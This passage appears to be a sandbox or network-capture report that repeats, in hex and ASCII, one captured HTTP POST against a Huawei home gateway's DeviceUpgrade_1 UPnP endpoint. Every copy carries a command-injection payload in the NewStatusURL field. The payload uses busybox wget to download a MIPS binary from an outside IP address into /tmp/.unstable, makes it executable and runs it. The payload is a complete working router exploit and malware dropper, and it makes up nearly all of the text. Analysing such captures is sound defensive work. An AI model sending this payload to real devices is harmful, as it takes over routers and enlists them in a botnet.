3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 